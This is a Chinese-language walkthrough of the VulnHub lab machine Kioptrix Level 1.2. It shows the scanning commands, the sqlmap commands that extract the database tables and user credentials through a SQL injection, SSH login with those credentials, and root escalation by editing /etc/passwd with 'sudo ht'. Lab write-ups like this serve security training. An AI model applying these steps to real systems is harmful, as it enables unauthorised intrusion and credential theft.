VulnHub滲透測驗實戰靶場 - KIOPTRIX: LEVEL 1.2
- 環境下載
- KIOPTRIX: LEVEL 1靶機搭建
- 滲透測驗
- 資訊搜集
- 漏洞挖掘
- getshell
- 提權
環境下載
戳此進行環境下載
KIOPTRIX: LEVEL 1靶機搭建
將下載好的靶機匯入Vmware,網路連接設定為NAT模式即可
滲透測驗
資訊搜集
用arp-scan探測一下網段內目標靶機的IP:
sudo arp-scan -l
得到目標靶機的IP為:192.168.246.135
用Nmap探測一下目標靶機IP的埠資訊:
sudo nmap -sS -A 192.168.246.135,發現開放了22和80兩個埠
用dirb掃描一下web目錄:
dirb http://192.168.246.135
漏洞挖掘
測驗后發現需要添加一個host
發現
http://192.168.246.135/gallery/gallery.php?id=1存在SQL注入漏洞
利用sqlmap得到資料庫名:
sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 --dbs
利用sqlmap得到gallery資料庫中的表名:
sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery --tables
利用sqlmap得到gallery資料庫中的表名:
sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns
得到一組用戶名和密碼:
admin:n0t7t1k4
在另一個表
dev_accounts中,得到了兩組用戶名和密碼
dreg:Mast3r
loneferret:starwars
getshell
利用上述得到的資訊,發現后兩組用戶名和密碼可以成功連接ssh
提權
查看
/etc/passwd發現loneferret用戶存在利用點
查看
loneferret用戶家目錄下資訊
根據提示,使用
sudo ht命令,修改/etc/passwd中loneferret用戶和root用戶一樣
重新連接ssh,發現成功提權到root用戶
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/292868.html
標籤:其他